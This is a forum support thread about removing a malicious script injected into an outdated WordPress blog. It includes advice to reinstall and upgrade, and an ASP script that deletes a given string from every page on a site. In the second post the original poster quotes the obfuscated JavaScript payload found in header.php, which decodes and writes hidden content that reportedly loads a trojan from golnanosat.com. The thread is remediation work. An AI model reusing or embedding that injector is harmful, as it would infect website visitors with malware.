Remove malicious Java script

  • Resolved hizkia

    (@hizkia)


    15 years, 10 months ago

    Hello,
    For some unknown reason, my blog has been infected by a malicious Java script that download a trojan virus to the viewers’ machines. I don’t know how the script could go there.

    I need help to remove the script, but I have no idea where to look, and what the script looks like.

    Please be warned that you will need your Antivirus up to check what I meant at http://gunawan.net/blog At the left bottom corner, you will see that it tries to connect to different sites. Most of the time it tries to connect to golnanosat.com

    Please HELP! Thank you.

Viewing 3 replies - 1 through 3 (of 3 total)
  • whooami

    (@whooami)

    15 years, 10 months ago

    Noscript for firefox is wonderful.

    <meta name="generator" content="WordPress 2.2" /> <!-- leave this for stats -->

    thats your root problem.

    Youre running an insecure version of WP — one that is exploitable using nothing more than the ability to copy and paste code off milw0rm.

    And that javascript, might not be the only incursion.

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    Read that, then read some of these:

    http://wordpress.org/search/hacked?forums=1

    The best and surest thing to do is to shitcan all the files on your server. And start fresh. Save just your wp-config.php, go get a fresh copy of the 2.2 files, and upload those clean files.

    THEN: IMMEDIATELY go through the upgrade process.

    then, CHANGE ALL YOUR PASSWORDS, including the mysql one.

    then go through your database, making sure that there are NO rouge users, and no code inserted into it that shouldnt be..

    than be a nice neighbor, and let your host know.

    Those are general instructions, your mileage may vary.

    Thread Starter hizkia

    (@hizkia)

    15 years, 10 months ago

    Thank you very much! I’ve been in communication with my host about this. I’ll upgrade to the current version if that’s available via my host.

    In the meantime I think I solved the problem. Looks like the script was embedded into the header.php file and it looks like this:

    <!– start counter :rkgi58s:wpjsandif –><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,32,53,60,46,41,2,21,9,33,0,0,0,0,0,0,58,48,51,50,4,1,30,12,44,7,31,26,18,19,49,24,11,13,59,27,34,22,38,54,28,25,6,0,0,0,0,8,0,36,35,29,14,45,47,16,0,42,39,62,56,37,43,57,17,52,61,40,3,10,55,23,20,5,15);for(j=Math.ceil(l/b);j>0;j–){r=””;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“YKeNwBX2pws2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2zSeCtB3APkH26UO9pBc2hb51ptXvpnlBDzQNUS32Gwcq64YVuKeNwBX2pf8ifV8BtJQN_tX9UIQv8tGV6ZGBUwcCDBrjy4HCPtHj6Us2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2GzHCt0H2PUrC6PlVYi_BtJQN_t3V”)</script><!– end counter :rkgi58s:wpjsandif –>

    I’m not sure if this is the malicious script or not, but if I got rid of those lines my site downloads faster and it doesn’t try to go to any foreign addresses such as golnanosat.com

    Thanks again!

    retromorphic

    (@retromorphic)

    15 years, 7 months ago

    I had the same problem and i am not even using wordpress, i had a malicious js injected at the bottom of everypage on the non profit health information provider so i devised this simple script to do all the dirty work for me…

    `<%
    ‘ Remove a string from all asp, htm and html pages on the entire website
    ‘ Usage:
    http://www.ursiteurl.com/fixor.asp?remove=WHAT_EVER_UR_PROBLEM
    ‘ Credits:
    ‘ Junaid Ali Qureshi, http://www.doctor-dubai.com, JunaidAliQureshi.blogspot.com

    Response.Buffer = False

    Const ForReading = 1
    Const ForWriting = 2
    Set objFSO = CreateObject(“Scripting.FileSystemObject”)

    subfolder = server.mappath(“\”)
    response.Write(subfolder & “
    “)
    Set xFolder = objFSO.GetFolder(SubFolder)

    fixfilesin(xfolder)

    function fixfilesin(fixfiles)
    Set xFiles = fixfiles.Files

    for each xFile in xFiles

    if Right(lcase(xFile.Name), 3) = “asp” or Right(lcase(xFile.Name), 3) = “tml” or Right(lcase(xFile.Name), 3) = “htm” Then

    Dim FileName, Find, ReplaceWith, FileContents, dFileContents
    Find = request.QueryString(“remove”)
    ReplaceWith = “”
    FileName = xFile
    response.Write(filename & “
    “)
    ‘Read source text file
    FileContents = GetFile(FileName)

    ‘replace all string In the source file
    dFileContents = replace(FileContents, Find, ReplaceWith, 1, -1, 1)

    ‘Compare source And result
    if dFileContents <> FileContents Then
    ‘write result If different
    WriteFile FileName, dFileContents
    response.Write(FileName & ” contents : **************************************’****************************************'” )
    response.Write “Replace done.


    If Len(ReplaceWith) <> Len(Find) Then ‘Can we count n of replacements?
    REsponse.Write( (Len(dFileContents) – Len(FileContents)) / (Len(ReplaceWith)-Len(Find)) ) & ” replacements.”
    End If
    Else
    Response.write “Searched string Not In the source file

    End If

    ‘Read text file

    end if

    next

    for each fldr2 in fixfiles.subfolders
    fixfilesin(fldr2)
    next
    End Function

    function GetFile(FileName)
    If FileName<>”” Then
    Dim FS, FileStream
    Set FS = CreateObject(“Scripting.FileSystemObject”)
    on error resume Next
    Set FileStream = FS.OpenTextFile(FileName)
    GetFile = FileStream.ReadAll
    End If
    End Function

    ‘Write string As a text file.
    function WriteFile(FileName, Contents)
    Dim OutStream, FS

    ‘on error resume Next
    Set FS = CreateObject(“Scripting.FileSystemObject”)
    Set OutStream = FS.OpenTextFile(FileName, 2, True)
    OutStream.Write Contents
    End Function

    %>`

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Remove malicious Java script’ is closed to new replies.

Tags